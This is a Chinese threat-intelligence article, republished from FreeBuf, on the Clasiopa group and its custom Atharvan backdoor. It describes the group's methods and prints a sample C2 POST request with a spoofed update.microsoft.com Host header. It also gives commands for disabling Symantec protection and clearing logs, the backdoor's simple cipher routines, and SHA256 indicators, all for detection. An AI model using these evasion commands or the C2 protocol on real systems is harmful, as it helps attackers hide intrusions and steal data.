前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >疑似印度黑客针对亚洲材料行业发起攻击

疑似印度黑客针对亚洲材料行业发起攻击

作者头像
FB客服
发布2023-03-29 15:58:10
2850
发布2023-03-29 15:58:10
举报
文章被收录于专栏:FreeBuf

研究人员发现一个未知的攻击组织以亚洲一家材料行业的公司为攻击目标,被命名为 Clasiopa。该组织使用独特的攻击工具,开发了定制化的后门 Atharvan。

Clasiopa 的 TTP

尚不清楚 Clasiopa 的攻击媒介是什么,研究人员猜测是通过对外开放的服务进行暴力破解获取的访问权限。

攻击中还有许多特征:

利用 ifconfig.me/ip 获取失陷主机的 IP 地址 试图通过停止 SepMasterService 来停用 Symantec Endpoint Protection,再利用 smc -stop 彻底禁用安全防护软件 使用多个后门来外传文件名列表,列表存储在 Thumb.db 文件或 ZIP 压缩文件中 使用 wsmprovhost 清除 Sysmon 日志 使用 PowerShell 清除所有事件日志 创建计划任务获取文件名

在一台失陷主机上发现了运行的 Agile DGS 和 Agile FD 服务,恶意样本被放置在名为 dgs 的文件夹中。与此同时,一个后门被从 atharvan.exe 重命名为 agile_update.exe。另一台失陷主机上运行着 HCL Domino 服务,但并不清楚这是否是巧合。但这些服务都在使用旧证书,还包含部分存在漏洞的库。

攻击工具

攻击者使用了自研的远控木马 Atharvan,以及开源远控木马 Lilith 的定制版本。此外,攻击者还使用了 Thumbsender 与自定义代理工具。

Atharvan

Atharvan 样本文件在运行时会创建名为 SAPTARISHI-ATHARVAN-101的互斥量,因此得名。

C&C 服务器硬编码在样本中,位于 AWS 的韩国区。POST 请求中,Host 被硬编码为 update.microsoft.com。例如:

代码语言:javascript
复制
POST /update.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52Host: update.microsoft.comContent-type: application/x-www-form-urlencodedContent-length: 46id=Atharvan&code=101&cid=H^[REDACTED]&time=5

(向右滑动,查看更多)

代码语言:javascript
复制

请求参数如下:

id:硬编码为 Atharvan code:表示请求目的 cid:硬编码字符后为失陷主机的 MAC 地址 time:通信时间间隔 msg:根据 code 参数不同表示请求目的

在加密 msg 时,恶意软件使用以下加密算法:

代码语言:javascript
复制
def encrypt(plaintext):return bytes([((2 - byte) & 0xff) for byte in plaintext])(向右滑动,查看更多)

恶意软件使用简单的 HTTP 解析工具在服务器响应中提取信息,解密算法如下所示:

代码语言:javascript
复制
def decrypt(ciphertext):return bytes([((2 - byte) & 0xff) for byte in ciphertext])

(向右滑动,查看更多)

代码语言:javascript
复制

获取命令时,恶意软件预期解密的正文由 \x1A 分隔的字符串组成。每个字符串的第一个字节用于指定要执行的命令,其余字节为命令参数:

【Atharvan 命令参数】

配置计划通信,命令参数指定时间与日期,编码为:

无限制(0x16) 指定月中的天(0x17) 指定星期几(0x18)

预制的通信模式是该恶意软件的另一个不常见的特征。

归因

目前没有确切的证据表明 Clasiopa 的背景与动机。尽管 Atharvan 在后门中使用了印地语作为互斥体的名字(SAPTARISHI-ATHARVAN-101),而且 Atharvan 也是印度教的神明。后门向 C&C 服务器发送的 POST 请求为 d=%s&code=%d&cid=%s&time=%dtharvan,攻击者用于 ZIP 压缩文件的密码为 iloveindea1998^_^。尽管这些细节可能表明该组织位于印度,但这些信息也可能是作为虚假 Flag 植入其中,尤其是密码似乎过于明显。

IOC

5b74b2176b8914b0c4e6215baab9e96d1e9a773803105cf50dac0427fac79c1b 8aa6612c95c7cef49709596da43a0f8354f14d8c08128c4cb9b1f37e548f083b 95f76a95adcfdd91cb626278006c164dcc46009f61f706426b135cdcfa9598e3 940ab006769745b19de5e927d344c4a4f29cae08e716ee0b77115f5f2a2e3328 38f0f2d658e09c57fc78698482f2f638843eb53412d860fb3a99bb6f51025b07 c94c42177d4f9385b02684777a059660ea36ce6b070c2dba367bf8da484ee275 f93ddb2377e02b0673aac6d540a558f9e47e611ab6e345a39fd9b1ba9f37cd22 3aae54592fe902be0ca1ab29afe5980be3f96888230d5842e93b3ca230f8d18d 0550e1731a6aa2546683617bd33311326e7b511a52968d24648ea231da55b7e5 8023b2c1ad92e6c5fec308cfafae3710a5c47b1e3a732257b69c0acf37cb435b 1569074db4680a9da6687fb79d33160a72d1e20f605e661cc679eaa7ab96a2cd

参考来源:

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research

精彩推荐

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-03-04,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • Clasiopa 的 TTP
  • 攻击工具
    • Atharvan
    • (向右滑动,查看更多)
    • (向右滑动,查看更多)
    • 归因
    • IOC
    • 参考来源:
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档